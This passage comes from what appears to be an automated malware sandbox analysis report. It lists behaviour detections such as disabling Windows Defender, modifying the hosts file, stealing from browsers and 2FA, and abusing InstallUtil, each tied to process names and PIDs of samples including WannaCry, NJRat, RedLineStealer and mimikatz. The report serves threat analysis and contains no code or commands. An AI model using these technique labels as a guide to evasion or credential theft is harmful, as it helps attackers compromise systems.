      • powershell.exe (PID: 28432)
    • The process executes via Task Scheduler

      • powershell.exe (PID: 28432)
    • Mutex name with non-standard characters

      • cfxre.exe (PID: 15064)
      • FXServer.exe (PID: 23216)
    • File deletion via cmd.exe

      • cmd.exe (PID: 18392)
      • cmd.exe (PID: 16508)
    • Executable started from TEMP via cmd.exe

      • cmd.exe (PID: 18392)
      • cmd.exe (PID: 28904)
      • cmd.exe (PID: 28888)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 11696)
    • Creates new GUID (POWERSHELL)

      • CFXBypass.exe (PID: 7780)
      • CFXBypass.exe (PID: 4316)
      • Silentum_Spoofer.exe (PID: 2220)
      • CFXBypass.exe (PID: 5920)
    • Modifies hosts file to alter network resolution

      • taskmoder.exe (PID: 25576)
    • Malware-specific behavior (creating "System.dll" in Temp)

      • Rsvp_invite%23903388.exe (PID: 25676)
    • Windows service management via SC.EXE

      • sc.exe (PID: 17888)
      • sc.exe (PID: 26184)
    • Deletes a service using sc.exe

      • sc.exe (PID: 17888)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 28856)
    • Starts CMD.EXE with AutoRun commands disabled

      • cmd.exe (PID: 28896)
    • Uses WMIC.EXE to obtain BIOS management information

      • cmd.exe (PID: 21412)
    • Uses TASKKILL.EXE to kill process

      • fastping_silent_v4.exe (PID: 11640)
    • Possible stealing from 2fa

      • bnkrigkawd.exe (PID: 15452)
    • Drop NetSupport executable file

      • snd16061.exe (PID: 12744)
    • Manipulates environment variables

      • powershell.exe (PID: 21952)
    • Potential Corporate Privacy Violation

      • Meredrop.exe (PID: 12820)
      • xblkpfZ8Y4.exe (PID: 23264)
    • Possible stealing from browsers

      • bnkrigkawd.exe (PID: 15452)
    • Process abuses InstallUtil.exe to run a .NET payload

      • cock.exe (PID: 18484)
      • cock.exe (PID: 23896)
    • Uses NETSH.EXE to add a firewall rule or allowed programs

      • NJRat.exe (PID: 14660)
    • Checks for external IP

      • svchost.exe (PID: 12560)
    • Execution of CURL command (POWERSHELL)

      • powershell.exe (PID: 15488)
    • Disables Windows Defender real-time protection (POWERSHELL)

      • powershell.exe (PID: 14672)
    • Suspicious use of NETSH.EXE

      • EdmsLauncher.exe (PID: 22800)
  • INFO

    • Reads the computer name

      • main.exe (PID: 1904)
      • main.exe (PID: 2456)
      • support.client.exe (PID: 2648)
      • agent.x64.exe (PID: 7868)
      • dfsvc.exe (PID: 4704)
      • stub.exe (PID: 3536)
      • nk.exe (PID: 1652)
      • Silentum_Spoofer.exe (PID: 7884)
      • Silentum_Spoofer.exe (PID: 2220)
      • file_c8e4af3ea647650f.exe (PID: 4776)
      • CFXBypass.exe (PID: 5920)
      • CFXBypass.exe (PID: 7780)
      • he.exe (PID: 5564)
      • v38438.exe (PID: 2676)
      • net_launcher.exe (PID: 2652)
      • CFXBypass.exe (PID: 4316)
      • Silentum_Spoofer.exe (PID: 7488)
      • n743.exe (PID: 7352)
      • ybaCy8KVcyR0.exe (PID: 11364)
      • Violet.exe (PID: 11672)
      • Guel+7KJvOKF.exe (PID: 11592)
      • HorionInjector.exe (PID: 11724)
      • Client.exe (PID: 11820)
      • TempSpoofer.exe (PID: 11844)
      • pieletJF_vm.exe (PID: 11664)
      • Bugsoft.exe (PID: 11648)
      • hey.exe (PID: 8244)
      • x834.exe (PID: 12312)
      • pieletJF.exe (PID: 12332)
      • Qbix01.exe (PID: 11788)
      • winvnc.exe (PID: 13128)
      • svchost.exe (PID: 13292)
      • Axam.a.exe (PID: 2828)
      • 01.exe (PID: 13980)
      • XClient.exe (PID: 14296)
      • TempSpoofer.exe (PID: 14084)
      • Yellow%20Pages%20Scraper.exe (PID: 14272)
      • Update.exe (PID: 12876)
      • Install.exe (PID: 14304)
      • LOIC.exe (PID: 15040)
      • requirements.exe (PID: 14264)
      • svchost.exe (PID: 14372)
      • TempSpoofer.exe (PID: 13996)
      • AddMeFast%20Bot.exe (PID: 14036)
      • TempSpoofer.exe (PID: 13884)
      • keygen.exe (PID: 14052)
      • svchost.exe (PID: 7660)
      • Prolin.exe (PID: 13960)
      • Cloudy.exe (PID: 14380)
      • svchost.exe (PID: 13460)
      • svchost.exe (PID: 12464)
      • XClient.exe (PID: 15508)
      • doitallmain.exe (PID: 14312)
      • XClient.exe (PID: 13440)
      • XClient.exe (PID: 14920)
      • Violet.exe (PID: 13928)
      • TempSpoofer.exe (PID: 13892)
      • Tinder%20Bot.exe (PID: 14604)
      • svchost.exe (PID: 14544)
      • svchost.exe (PID: 14612)
      • cssgo.exe (PID: 14720)
      • Meredrop.exe (PID: 12820)
      • XClient.exe (PID: 16404)
      • jeditor.exe (PID: 14952)
      • svchost.exe (PID: 16392)
      • XClient.exe (PID: 14624)
      • bnkrigkawd.exe (PID: 15452)
      • hack1226.exe (PID: 14576)
      • MEMZ.exe (PID: 17000)
      • Cloudy.exe (PID: 14860)
      • Anap.a.exe (PID: 14844)
      • rmd_en_1.exe (PID: 14076)
      • Pdf%20Reader.exe (PID: 14320)
      • brbotnet.exe (PID: 13572)
      • Bexitor%20Installer.exe (PID: 14812)
      • zke-nfoview.exe (PID: 17072)
      • AAozznaq.exe (PID: 14340)
      • CryptoLocker.exe (PID: 15536)
      • Amus.exe (PID: 14728)
      • Lab01-02.exe (PID: 14092)
      • BootstrapperNew.exe (PID: 17148)
      • 3e3ev3.exe (PID: 17156)
      • G7_Update.exe (PID: 17120)
      • ClipAid-Pro.exe (PID: 17652)
      • downloader.exe (PID: 14280)
      • Client.exe (PID: 16784)
      • svchost.exe (PID: 14680)
      • BootstrapperNew.exe (PID: 17164)
      • Fast%20Download.exe (PID: 15024)
      • Auo1.exe (PID: 13968)
      • mport.exe (PID: 14620)
      • brbotnet.exe (PID: 16252)
      • popapoers.exe (PID: 14796)
      • Vikings.exe (PID: 13384)
      • steamerx.exe (PID: 15096)
      • self-injection.exe (PID: 14712)
      • REXCEL~1.EXE (PID: 18076)
      • 444.exe (PID: 13000)
      • cfxre.exe (PID: 15064)
      • 444.exe (PID: 14128)
      • pardufrigi_installer_1.0.p1.exe (PID: 20660)
      • Fast%20Download.exe (PID: 17644)
      • build1.exe (PID: 21008)
      • InfinityCrypt.exe (PID: 20676)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 19316)
      • calendar.exe (PID: 20644)
      • rod_en_1.exe (PID: 16900)
      • NJRat.exe (PID: 14660)
      • Petya.A.exe (PID: 20612)
      • assignment.exe (PID: 12576)
      • bypass.exe (PID: 20652)
      • is-F7NCO.tmp (PID: 21452)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 14688)
      • justpoc.exe (PID: 20684)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 20744)
      • AGambXYA.exe (PID: 20948)
      • crypted.exe (PID: 21616)
      • 444.exe (PID: 16936)
      • pk.exe (PID: 20736)
      • curl.exe (PID: 18324)
      • ljgksdtihd.exe (PID: 22088)
      • PCclear_Eng_mini.exe (PID: 21544)
      • Client-built.exe (PID: 22148)
      • pardufrigi_installer_1.0.p1.tmp (PID: 21884)
      • safman_setup.tmp (PID: 21704)
      • curl.exe (PID: 21780)
      • services.exe (PID: 21668)
      • WannaCry.exe (PID: 21048)
      • cleanup_tool.exe (PID: 22140)
      • is-HVP5B.tmp (PID: 21876)
      • 444.exe (PID: 15056)
      • EdmsLauncher.exe (PID: 22800)
      • build.exe (PID: 23196)
      • payload.exe (PID: 23172)
      • PowerRat.exe (PID: 23352)
      • upm2008.exe (PID: 21976)
      • Steanings.exe (PID: 23180)
      • beacon.exe (PID: 23272)
      • FreeYoutubeDownloader.exe (PID: 23208)
      • ExtremeInjector.exe (PID: 23300)
      • prueba.exe (PID: 22112)
      • FXServer.exe (PID: 23216)
      • order_pdf.exe (PID: 16856)
      • BruterV3.1.exe (PID: 25524)
      • PowerRat.exe (PID: 25724)
      • curl.exe (PID: 23904)
      • ksv.exe (PID: 13836)
      • pfntjejghjsdkr.exe (PID: 23660)
      • ScreenConnect.ClientSetup.exe (PID: 25560)
      • msiexec.exe (PID: 26084)
      • chrome_update.exe (PID: 13944)
      • putty.exe (PID: 23988)
      • taskmoder.exe (PID: 25576)
      • mvc3.exe (PID: 24524)
      • aspnet_regiis.exe (PID: 18344)
      • Security.exe (PID: 25716)
      • Pulsar-Client.exe (PID: 24080)
      • Pulsar-Client.exe (PID: 21228)
      • Pinaview.exe (PID: 25684)
      • Solara.exe (PID: 12232)
      • CoronaVirus.exe (PID: 25648)
      • NoEscape.exe (PID: 26132)
      • ClientRun.exe (PID: 27280)
      • VOKLIGHTD.exe (PID: 25668)
      • NAMUVPN7.exe (PID: 6668)
      • namuvpnx2.exe (PID: 25632)
      • cheet.exe (PID: 25584)
      • conhost.exe (PID: 27168)
      • ExtremeInjector.exe (PID: 23696)
      • VOKLIGHT.exe (PID: 14016)
      • RegAsm.exe (PID: 28240)
      • Phantom.exe (PID: 14260)
      • VLTKTanthuTN.exe (PID: 27720)
      • Updater.exe (PID: 20884)
      • AutoIt3.exe (PID: 12904)
      • srtware.exe (PID: 15140)
      • GMSSetupX86.exe (PID: 25540)
      • 4J8576A0E8V3.exe (PID: 23676)
      • bnoaprihjatuasss.exe (PID: 26100)
      • PrivacyPolicy.tmp (PID: 12624)
      • PXray_Cast_Sort.exe (PID: 4272)
      • SharpHound.exe (PID: 25640)
      • 4J8576A0E8V3.exe (PID: 28308)
      • NAMUVPN32.exe (PID: 11180)
      • RegAsm.exe (PID: 25928)
      • WindowsUpdate.exe (PID: 27876)
      • imgs.exe (PID: 16444)
      • Agentnov.exe (PID: 12156)
      • lol11.exe (PID: 28084)
      • lol1.exe (PID: 27740)
      • xblkpfZ8Y4.exe (PID: 23264)
      • 123123.exe (PID: 28072)
      • ReevLoader.exe (PID: 20544)
      • snd16061.exe (PID: 12744)
      • 52.exe (PID: 25732)
      • System.exe (PID: 27868)
      • Axam.exe (PID: 16464)
      • ShellHost.exe (PID: 24552)
      • Isass.exe (PID: 26140)
      • Free YouTube Downloader.exe (PID: 18016)
      • Isass.exe (PID: 25708)
      • namu832.exe (PID: 27656)
      • fo-wsftp605.exe (PID: 23924)
      • OfferedBuilt.exe (PID: 27732)
      • curl.exe (PID: 11916)
      • chrome_update_old.exe (PID: 28320)
      • lol.exe (PID: 7212)
      • AutoUpdate.exe (PID: 27692)
      • NoMoreRansom.exe (PID: 4784)
      • steamcmd.exe (PID: 12980)
      • Pinaview.tmp (PID: 28060)
      • LauncherLoader.exe (PID: 15000)
      • up.exe (PID: 27180)
    • Checks supported languages

      • main.exe (PID: 1904)
      • main.exe (PID: 2456)
      • support.client.exe (PID: 2648)
      • dfsvc.exe (PID: 4704)
      • vnc.exe (PID: 5704)
      • agent.x64.exe (PID: 7868)
      • nk.exe (PID: 1652)
      • Silentum_Spoofer.exe (PID: 7884)
      • stub.exe (PID: 3536)
      • Silentum_Spoofer.exe (PID: 2220)
      • Silentum_Spoofer.exe (PID: 7488)
      • CFXBypass.exe (PID: 7780)
      • v38438.exe (PID: 2676)
      • CFXBypass.exe (PID: 5920)
      • he.exe (PID: 5564)
      • n743.exe (PID: 7352)
      • CFXBypass.exe (PID: 4316)
      • UniversalBrowser.exe (PID: 7800)
      • file_c8e4af3ea647650f.exe (PID: 4776)
      • net_launcher.exe (PID: 2652)
      • s287.exe (PID: 11092)
      • ybaCy8KVcyR0.exe (PID: 11364)
      • Guel+7KJvOKF.exe (PID: 11592)
      • HorionInjector.exe (PID: 11724)
      • Client.exe (PID: 11820)
      • Bugsoft.exe (PID: 11648)
      • TempSpoofer.exe (PID: 11844)
      • Violet.exe (PID: 11672)
      • pieletJF_vm.exe (PID: 11664)
      • CryptoWall.exe (PID: 11896)
      • Qbix01.exe (PID: 11788)
      • hey.exe (PID: 8244)
      • x834.exe (PID: 12312)
      • Axam.a.exe (PID: 2828)
      • pieletJF.exe (PID: 12332)
      • pe2shc.exe (PID: 12604)
      • winvnc.exe (PID: 13128)
      • svchost.exe (PID: 13292)
      • TempSpoofer.exe (PID: 13884)
      • Violet.exe (PID: 13928)
      • chrome_update.exe (PID: 13944)
      • 01.exe (PID: 13980)
      • TempSpoofer.exe (PID: 13996)
      • AddMeFast%20Bot.exe (PID: 14036)
      • Prolin.exe (PID: 13960)
      • TempSpoofer.exe (PID: 14084)
      • doitallmain.exe (PID: 14312)
      • XClient.exe (PID: 14296)
      • LOIC.exe (PID: 14196)
      • Meredrop.exe (PID: 12820)
      • svchost.exe (PID: 14372)
      • XClient.exe (PID: 13440)
      • 2.exe (PID: 14436)
      • plantrojan.exe (PID: 14568)
      • Yellow%20Pages%20Scraper.exe (PID: 14272)
      • Update.exe (PID: 12876)
      • access.exe (PID: 14364)
      • nircmd.exe (PID: 14348)
      • XClient.exe (PID: 14920)
      • setup.exe (PID: 5404)
      • hell9o.exe (PID: 14452)
      • 444.exe (PID: 14128)
      • Install.exe (PID: 14304)
      • requirements.exe (PID: 14264)
      • 444.exe (PID: 13000)
      • setup.exe (PID: 14328)
      • LOIC.exe (PID: 15040)
      • 444.exe (PID: 15056)
      • Cloudy.exe (PID: 14380)
      • kg.exe (PID: 13076)
      • access.exe (PID: 12588)
      • agent.exe (PID: 14288)
      • downloader.exe (PID: 14280)
      • TEST.exe (PID: 15032)
      • 1223.exe (PID: 14236)
      • rxd_en_1.exe (PID: 14476)
      • TEST.exe (PID: 14560)
      • TempSpoofer.exe (PID: 13892)
      • svchost.exe (PID: 14612)
      • keygen.exe (PID: 14052)
      • svchost.exe (PID: 7660)
      • svchost.exe (PID: 13460)
      • svchost.exe (PID: 12464)
      • XClient.exe (PID: 15508)
      • XClient.exe (PID: 15128)
      • rmd_en_1.exe (PID: 14076)
      • 1.exe (PID: 14584)
      • Tinder%20Bot.exe (PID: 14604)
      • svchost.exe (PID: 14680)
      • Amus.exe (PID: 14728)
      • uac_bypass.exe (PID: 14704)
      • World%20of%20Tanks.exe (PID: 15468)
      • hack1226.exe (PID: 14576)
      • svchost.exe (PID: 14544)
      • cssgo.exe (PID: 14720)
      • XClient.exe (PID: 16404)
      • CryptoLocker.exe (PID: 15536)
      • winsetaccess64.exe (PID: 15048)
      • cfxre.exe (PID: 15064)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 14688)
      • Cloudy.exe (PID: 14860)
      • bnkrigkawd.exe (PID: 15452)
      • RuntimeBroker.exe (PID: 16960)
      • MEMZ.exe (PID: 17000)
      • 444.exe (PID: 16936)
      • Service.exe (PID: 17064)
      • connector1.exe (PID: 17112)
      • BootstrapperNew.exe (PID: 17164)
      • alphaTweaks.exe (PID: 15104)
      • Bexitor%20Installer.exe (PID: 14812)
      • G7_Update.exe (PID: 17120)
      • shell.exe (PID: 15120)
      • svchost.exe (PID: 16392)
      • brbotnet.exe (PID: 13572)
      • Fast%20Download.exe (PID: 15024)
      • Vikings.exe (PID: 13384)
      • script.exe (PID: 15780)
      • mimilove.exe (PID: 12612)
      • standalone_payload.exe (PID: 13940)
      • kdmapper_Release.exe (PID: 2832)
      • Auo1.exe (PID: 13968)
      • Pdf%20Reader.exe (PID: 14320)
      • writedat.exe (PID: 14028)
      • AAozznaq.exe (PID: 14340)
      • zke-nfoview.exe (PID: 17072)
      • Anap.a.exe (PID: 14844)
      • ClipAid-Pro.exe (PID: 17652)
      • process-injection.exe (PID: 14164)
      • hack.exe (PID: 14256)
      • NJRat.exe (PID: 14660)
      • AAozznaq.exe (PID: 18200)
      • mport.exe (PID: 14620)
      • EmmetPROD.exe (PID: 15520)
      • Lab01-02.exe (PID: 14092)
      • BootstrapperNew.exe (PID: 17148)
      • 3e3ev3.exe (PID: 17156)
      • OGFN%20Updater.exe (PID: 14652)
      • jeditor.exe (PID: 14952)
      • Client.exe (PID: 16784)
      • Fast%20Download.exe (PID: 17644)
      • Loader.exe (PID: 13388)
      • self-injection.exe (PID: 14712)
      • brbotnet.exe (PID: 16252)
      • dajoke2.exe (PID: 15548)
      • pclient.exe (PID: 16948)
      • kdmapper_Release.exe (PID: 17044)
      • popapoers.exe (PID: 14796)
      • EDMSLauncherSetup.exe (PID: 14980)
      • Mova.exe (PID: 16968)
      • steamerx.exe (PID: 15096)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 19316)
      • setup.exe (PID: 18764)
      • haeum.exe (PID: 16040)
      • rod_en_1.exe (PID: 16900)
      • REXCEL~1.EXE (PID: 18076)
      • wildfire-test-pe-file.exe (PID: 14772)
      • pardufrigi_installer_1.0.p1.exe (PID: 20660)
      • calendar.exe (PID: 20644)
      • win.exe (PID: 20636)
      • Serials_Checker.exe (PID: 20940)
      • Petya.A.exe (PID: 20612)
      • safman_setup.exe (PID: 20984)
      • InfinityCrypt.exe (PID: 20676)
      • build1.exe (PID: 21008)
      • bypass.exe (PID: 20652)
      • is-F7NCO.tmp (PID: 21452)
      • RMO_SE~2.EXE (PID: 16352)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 20744)
      • sanghyun.exe (PID: 20628)
      • better.exe (PID: 20668)
      • AGambXYA.exe (PID: 20948)
      • sanghyun-guest.exe (PID: 20992)
      • crypted.exe (PID: 21616)
      • is-HVP5B.tmp (PID: 21876)
      • pardufrigi_installer_1.0.p1.tmp (PID: 21884)
      • ljgksdtihd.exe (PID: 22088)
      • justpoc.exe (PID: 20684)
      • prueba.exe (PID: 22112)
      • pk.exe (PID: 20736)
      • Serials_Checker.exe (PID: 22132)
      • cleanup_tool.exe (PID: 22140)
      • curl.exe (PID: 18324)
      • Client-built.exe (PID: 22148)
      • v4343.exe (PID: 22156)
      • curl.exe (PID: 21780)
      • PCclear_Eng_mini.exe (PID: 21544)
      • services.exe (PID: 21668)
      • file.exe (PID: 18356)
      • WannaCry.exe (PID: 21048)
      • zke-ascv.exe (PID: 20640)
      • Jigsaw.exe (PID: 16616)
      • Steanings.exe (PID: 8076)
      • safman_setup.tmp (PID: 21704)
      • chcp.com (PID: 18524)
      • EdmsLauncher.exe (PID: 22800)
      • dxwebsetup.exe (PID: 22772)
      • ProcessHide32.exe (PID: 21840)
      • FreeYoutubeDownloader.exe (PID: 23208)
      • payload.exe (PID: 23172)
      • build.exe (PID: 23196)
      • 640.exe (PID: 23224)
      • FXServer.exe (PID: 23216)
      • beacon.exe (PID: 23272)
      • PowerRat.exe (PID: 23352)
      • 640.exe (PID: 17200)
      • builder.exe (PID: 23360)
      • IATInfect2008_64.exe (PID: 20128)
      • upm2008.exe (PID: 21976)
      • Steanings.exe (PID: 23180)
      • prueba.exe (PID: 23320)
      • dxwsetup.exe (PID: 12752)
      • order_pdf.exe (PID: 16856)
      • ExtremeInjector.exe (PID: 23300)
      • mode.com (PID: 23428)
      • pfntjejghjsdkr.exe (PID: 23660)
      • pdf.exe (PID: 22904)
      • assignment.exe (PID: 12576)
      • BruterV3.1.exe (PID: 25524)
      • taskmoder.exe (PID: 25576)
      • Pulsar-Client.exe (PID: 21228)
      • Pulsar-Client.exe (PID: 24080)
      • Solara.exe (PID: 12232)
      • PowerRat.exe (PID: 25724)
      • curl.exe (PID: 23904)
      • builder.exe (PID: 25592)
      • putty.exe (PID: 23988)
      • RegAsm.exe (PID: 26096)
      • PrivacyPolicy.exe (PID: 25548)
      • ScreenConnect.ClientSetup.exe (PID: 25560)
      • NoEscape.exe (PID: 26132)
      • ksv.exe (PID: 13836)
      • AutoIt3.exe (PID: 12904)
      • 52.exe (PID: 25732)
      • black.exe (PID: 25624)
      • gertgherthre.exe (PID: 7304)
      • msiexec.exe (PID: 26084)
      • Updater.exe (PID: 20884)
      • Client.exe (PID: 25960)
      • NAMUVPN7.exe (PID: 6668)
      • Isass.exe (PID: 26140)
      • mvc3.exe (PID: 24524)
      • VOKLIGHTD.exe (PID: 25668)
      • Pinaview.exe (PID: 25684)
      • xerox01_pdf.exe (PID: 25792)
      • VOKLIGHT.exe (PID: 14016)
      • Rsvp_invite%23903388.exe (PID: 25676)
      • Security.exe (PID: 25716)
      • namuvpnx2.exe (PID: 25632)
      • chcp.com (PID: 26416)
      • Hive%20Ransomware.exe (PID: 26124)
      • chcp.com (PID: 26896)
      • up.exe (PID: 27180)
      • aspnet_regiis.exe (PID: 18344)
      • cock.exe (PID: 18484)
      • chcp.com (PID: 26408)
      • Isass.exe (PID: 25708)
      • GMSSetupX86.exe (PID: 25540)
      • chcp.com (PID: 6404)
      • cheet.exe (PID: 25584)
      • Axam.exe (PID: 27044)
      • conhost.exe (PID: 27168)
      • paramssps.exe (PID: 2680)
      • Windows.x64.silent.CPU.exe (PID: 11808)
      • NoMoreRansom.exe (PID: 4784)
      • RambledMime.exe (PID: 3756)
      • AutoUpdate.exe (PID: 27692)
      • Printer_Driver_SSL_support_v43.22.209.99.exe (PID: 27664)
      • NAMUVPN32.exe (PID: 11180)
      • ExtremeInjector.exe (PID: 23696)
      • Agentnov.exe (PID: 12156)
      • 4J8576A0E8V3.exe (PID: 23676)
      • lol1.exe (PID: 27740)
      • ReevLoader.exe (PID: 20544)
      • VLTKTanthuTN.exe (PID: 27720)
      • Axam.exe (PID: 16464)
      • RegAsm.exe (PID: 28240)
      • OfferedBuilt.exe (PID: 27732)
      • crypted_c360a5b7.exe (PID: 27684)
      • lol11.exe (PID: 28084)
      • namu832.exe (PID: 27656)
      • bnoaprihjatuasss.exe (PID: 26100)
      • 4J8576A0E8V3.exe (PID: 28308)
      • PXray_Cast_Sort.exe (PID: 4272)
      • paramssps.exe (PID: 11192)
      • Phantom.exe (PID: 14260)
      • CoronaVirus.exe (PID: 25648)
      • PrivacyPolicy.tmp (PID: 12624)
      • snd16061.exe (PID: 12744)
      • RedLineStealer.exe (PID: 25500)
      • SharpHound.exe (PID: 25640)
      • srtware.exe (PID: 15140)
      • fastping_silent_v4.exe (PID: 11640)
      • ClientRun.exe (PID: 27280)
      • QuizPokemon.exe (PID: 24020)
      • lol.exe (PID: 7212)
      • System.exe (PID: 27868)
      • injector.exe (PID: 15384)
      • ZinTask.exe (PID: 15400)
      • RegAsm.exe (PID: 25928)
      • chrome_update_old.exe (PID: 28320)
      • 1488.exe (PID: 17516)
      • chcp.com (PID: 27844)
      • riende.exe (PID: 21940)
      • AutoGuarder_2.3.7.350.exe (PID: 26304)
      • WindowsUpdate.exe (PID: 27876)
      • LukeJazz.exe (PID: 15228)
      • CritScript.exe (PID: 15276)
      • ShellHost.exe (PID: 24552)
      • imgs.exe (PID: 16444)
      • LauncherLoader.exe (PID: 15000)
      • ChatLife.exe (PID: 24120)
      • Axam.exe (PID: 16128)
      • FXServer.exe (PID: 16136)
      • ChromeUpdate.exe (PID: 2900)
      • mimikatz.exe (PID: 11760)
      • bot.exe (PID: 5132)
      • 123123.exe (PID: 28072)
      • csc.exe (PID: 28856)
      • bsg.exe (PID: 27708)
      • mvc3.exe (PID: 28864)
      • 1210.exe (PID: 26792)
      • Free YouTube Downloader.exe (PID: 18016)
      • cvf.exe (PID: 28196)
      • curl.exe (PID: 11916)
      • PL4760.tmp (PID: 28032)
      • svchost.com (PID: 29564)
    • Create files in a temporary directory

      • main.exe (PID: 1904)
      • CFXBypass.exe (PID: 7780)
      • s287.exe (PID: 11092)
      • Silentum_Spoofer.exe (PID: 7488)
      • CFXBypass.exe (PID: 4316)
      • Silentum_Spoofer.exe (PID: 2220)
      • Silentum_Spoofer.exe (PID: 7884)
      • CFXBypass.exe (PID: 5920)
      • ybaCy8KVcyR0.exe (PID: 11364)
      • dfsvc.exe (PID: 4704)
      • Bugsoft.exe (PID: 11648)
      • Axam.a.exe (PID: 2828)
      • TempSpoofer.exe (PID: 11844)
      • Qbix01.exe (PID: 11788)
      • hell9o.exe (PID: 14452)
      • explorer.exe (PID: 4696)
      • rxd_en_1.exe (PID: 14476)
      • Prolin.exe (PID: 13960)
      • doitallmain.exe (PID: 14312)
      • rmd_en_1.exe (PID: 14076)
      • TempSpoofer.exe (PID: 14084)
      • cfxre.exe (PID: 15064)
      • Amus.exe (PID: 14728)
      • downloader.exe (PID: 14280)
      • Bexitor%20Installer.exe (PID: 14812)
      • 3e3ev3.exe (PID: 17156)
      • TempSpoofer.exe (PID: 13892)
      • alphaTweaks.exe (PID: 15104)
      • setup.exe (PID: 18764)
      • EDMSLauncherSetup.exe (PID: 14980)
      • TempSpoofer.exe (PID: 13996)
      • pardufrigi_installer_1.0.p1.exe (PID: 20660)
      • rod_en_1.exe (PID: 16900)
      • Serials_Checker.exe (PID: 20940)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 14688)
      • safman_setup.exe (PID: 20984)
      • RMO_SE~2.EXE (PID: 16352)
      • is-F7NCO.tmp (PID: 21452)
      • Serials_Checker.exe (PID: 22132)
      • sanghyun.exe (PID: 20628)
      • sanghyun-guest.exe (PID: 20992)
      • bypass.exe (PID: 20652)
      • pardufrigi_installer_1.0.p1.tmp (PID: 21884)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 21608)
      • FXServer.exe (PID: 23216)
      • dxwebsetup.exe (PID: 22772)
      • FreeYoutubeDownloader.exe (PID: 23208)
      • Client.exe (PID: 16784)
      • 2.exe (PID: 14436)
      • Client.exe (PID: 25960)
      • mvc3.exe (PID: 24524)
      • PrivacyPolicy.exe (PID: 25548)
      • ksv.exe (PID: 13836)
      • Pinaview.exe (PID: 25684)
      • brbotnet.exe (PID: 16252)
      • brbotnet.exe (PID: 13572)
      • black.exe (PID: 25624)
      • Security.exe (PID: 25716)
      • msiexec.exe (PID: 12488)
      • msiexec.exe (PID: 27152)
      • msiexec.exe (PID: 18176)
      • Axam.exe (PID: 16464)
      • Rsvp_invite%23903388.exe (PID: 25676)
      • CritScript.exe (PID: 15276)
      • lol11.exe (PID: 28084)
      • PrivacyPolicy.tmp (PID: 12624)
      • ScreenConnect.ClientSetup.exe (PID: 25560)
      • OfferedBuilt.exe (PID: 27732)
      • lol1.exe (PID: 27740)
      • FXServer.exe (PID: 16136)
      • Axam.exe (PID: 16128)
      • injector.exe (PID: 15384)
      • Isass.exe (PID: 26140)
      • Isass.exe (PID: 25708)
      • Printer_Driver_SSL_support_v43.22.209.99.exe (PID: 27664)
      • QuizPokemon.exe (PID: 24020)
      • LukeJazz.exe (PID: 15228)
    • Reads security settings of Internet Explorer

      • explorer.exe (PID: 4696)
      • Taskmgr.exe (PID: 7712)
      • agent.x64.exe (PID: 7868)
      • stub.exe (PID: 3536)
      • Silentum_Spoofer.exe (PID: 7488)
      • CFXBypass.exe (PID: 7780)
      • dfsvc.exe (PID: 4704)
      • CFXBypass.exe (PID: 4316)
      • Silentum_Spoofer.exe (PID: 7884)
      • Silentum_Spoofer.exe (PID: 2220)
      • CFXBypass.exe (PID: 5920)
      • file_c8e4af3ea647650f.exe (PID: 4776)
      • fodhelper.exe (PID: 11872)
      • TempSpoofer.exe (PID: 11844)
      • svchost.exe (PID: 12560)
      • Client.exe (PID: 11820)
      • TempSpoofer.exe (PID: 14084)
      • 01.exe (PID: 13980)
      • LOIC.exe (PID: 15040)
      • TempSpoofer.exe (PID: 13892)
      • HorionInjector.exe (PID: 11724)
      • LOIC.exe (PID: 14196)
      • alphaTweaks.exe (PID: 15104)
      • BootstrapperNew.exe (PID: 17164)
      • TempSpoofer.exe (PID: 13996)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 19316)
      • BootstrapperNew.exe (PID: 17148)
      • justpoc.exe (PID: 20684)
      • PCclear_Eng_mini.exe (PID: 21544)
      • Amus.exe (PID: 14728)
      • explorer.exe (PID: 12952)
      • explorer.exe (PID: 22304)
      • WerFault.exe (PID: 17448)
      • downloader.exe (PID: 14280)
      • msiexec.exe (PID: 23232)
      • cfxre.exe (PID: 15064)
      • assignment.exe (PID: 12576)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 14688)
      • G7_Update.exe (PID: 17120)
      • 2.exe (PID: 14436)
      • beacon.exe (PID: 23272)
      • Jigsaw.exe (PID: 16616)
      • VOKLIGHTD.exe (PID: 25668)
      • 444.exe (PID: 15056)
      • 640.exe (PID: 17200)
      • FXServer.exe (PID: 23216)
      • VOKLIGHT.exe (PID: 14016)
      • FreeYoutubeDownloader.exe (PID: 23208)
      • calendar.exe (PID: 20644)
      • paramssps.exe (PID: 11192)
      • Agentnov.exe (PID: 12156)
      • taskmoder.exe (PID: 25576)
      • Security.exe (PID: 25716)
      • black.exe (PID: 25624)
      • AutoUpdate.exe (PID: 27692)
      • ReevLoader.exe (PID: 20544)
    • The sample compiled with english language support

      • main.exe (PID: 1904)
      • main.exe (PID: 2456)
      • Qbix01.exe (PID: 11788)
      • Axam.a.exe (PID: 2828)
      • Prolin.exe (PID: 13960)
      • 2.exe (PID: 14436)
      • rmd_en_1.exe (PID: 14076)
      • setup.exe (PID: 18764)
      • RMO_SE~2.EXE (PID: 16352)
      • is-F7NCO.tmp (PID: 21452)
      • WannaCry.exe (PID: 21048)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 21608)
      • is-HVP5B.tmp (PID: 21876)
      • dxwebsetup.exe (PID: 22772)
      • dxwsetup.exe (PID: 12752)
      • Client.exe (PID: 25960)
      • 640.exe (PID: 17200)
      • ksv.exe (PID: 13836)
      • mvc3.exe (PID: 24524)
      • Amus.exe (PID: 14728)
      • PrivacyPolicy.tmp (PID: 12624)
      • Rsvp_invite%23903388.exe (PID: 25676)
      • CoronaVirus.exe (PID: 25648)
